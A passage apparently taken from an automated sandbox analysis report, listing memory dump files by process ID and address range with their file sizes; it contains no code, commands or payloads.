                                                                                                                                                                                                    • memory/4736-213-0x00007FF642C74060-mapping.dmp
                                                                                                                                                                                                    • memory/4736-223-0x00000155800D0000-0x000001558011B000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      300KB

                                                                                                                                                                                                    • memory/4736-225-0x0000015580260000-0x00000155802D0000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      448KB

                                                                                                                                                                                                    • memory/4736-266-0x0000015582A00000-0x0000015582B01000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                    • memory/4776-230-0x0000000000670000-0x0000000000672000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      8KB

                                                                                                                                                                                                    • memory/4776-237-0x0000000000672000-0x0000000000674000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      8KB

                                                                                                                                                                                                    • memory/4776-240-0x0000000000674000-0x0000000000675000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      4KB

                                                                                                                                                                                                    • memory/4776-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/4776-241-0x0000000000675000-0x0000000000677000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      8KB

                                                                                                                                                                                                    • memory/4816-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/4816-231-0x00000000029E0000-0x00000000029E2000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      8KB

                                                                                                                                                                                                    • memory/4872-239-0x00000000011E2000-0x00000000011E4000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      8KB

                                                                                                                                                                                                    • memory/4872-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/4872-229-0x00000000011E0000-0x00000000011E2000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      8KB

                                                                                                                                                                                                    • memory/4872-243-0x00000000011E5000-0x00000000011E6000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      4KB

                                                                                                                                                                                                    • memory/4912-334-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/4992-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/4992-235-0x0000000000A40000-0x0000000000A4D000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      52KB

                                                                                                                                                                                                    • memory/5044-314-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5164-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5312-309-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5320-296-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5380-245-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5388-246-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5456-328-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5456-330-0x0000000004FF0000-0x00000000055F6000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                    • memory/5492-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5524-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5532-249-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5568-250-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5576-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5596-333-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5596-337-0x0000000004846000-0x0000000004947000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                    • memory/5596-338-0x0000000004A10000-0x0000000004A6C000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      368KB

                                                                                                                                                                                                    • memory/5620-348-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5660-251-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5660-275-0x0000000000BA4000-0x0000000000BA5000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      4KB

                                                                                                                                                                                                    • memory/5660-258-0x0000000000BA0000-0x0000000000BA2000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      8KB

                                                                                                                                                                                                    • memory/5772-254-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5884-255-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5884-259-0x0000000000430000-0x00000000004DE000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      696KB

                                                                                                                                                                                                    • memory/5884-260-0x0000000002060000-0x0000000002072000-memory.dmp
                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      72KB

                                                                                                                                                                                                    • memory/5944-301-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/5976-311-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6000-331-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6048-327-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6204-353-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6212-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6364-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6372-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6412-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6536-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6560-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6604-358-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6644-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6692-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6752-361-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6816-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6856-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/6928-364-0x0000000000402F68-mapping.dmp
                                                                                                                                                                                                    • memory/7008-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                    • memory/7088-366-0x0000000000000000-mapping.dmp